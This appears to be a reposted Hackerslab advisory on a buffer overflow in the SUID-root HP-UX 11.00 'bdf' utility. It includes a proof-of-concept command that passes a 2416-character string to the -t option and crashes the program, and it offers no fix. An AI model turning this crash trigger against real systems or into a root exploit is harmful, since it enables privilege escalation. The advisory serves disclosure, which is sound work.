[ SOURCE: http://www.secureroot.com/security/advisories/9737056304.html ]

================================================================================

 

             [ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul

 

================================================================================

 

 

 

File   :   /usr/bin/bdf

 



SYSTEM :   HP-UX 11.00

 

           Tested by  HP-UX B.11.00

 

INFO :

 

           bdf - report number of free disk blocks (Berkeley version)

 

           -t type        Report on the file systems of a given type (for

                          example, nfs or hfs).

 



* 'bdf' program has SUID permission.

 

$ ls -la `which bdf`

-r-sr-xr-x   1 root       bin          24576 Apr  7  1998 /usr/bin/bdf

 

* Using '-t' option with long character   

 

$ bdf -t `perl -e 'print "A"x2415'`

bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAA..omited...AAAAAAAAAAAAAAAA : No such file or directory

usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]

$ bdf -t `perl -e 'print "A"x2416'` 

Memory fault

$

 

<bash environment>

bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`       

Segmentation fault

bash-2.04$

 

***

 

If bigger than 2415 characters, 'bdf' has Segment faulted.

Maybe.. 'bdf' has not checked string boundary.

 

SOLUTION

 

Don't know :)

 



==-------------------------------------------------------------------------------==

       *********

   *    **   **    *

 *      **   **      *

*       *******      *

 *      **   **      *                                       dubhe@hackerslab.org

   *    **   **    *                                    [  http://www.hackerslab.org ]

       *********           HACKERSLAB (C)  since 2000

==-------------------------------------------------------------------------------==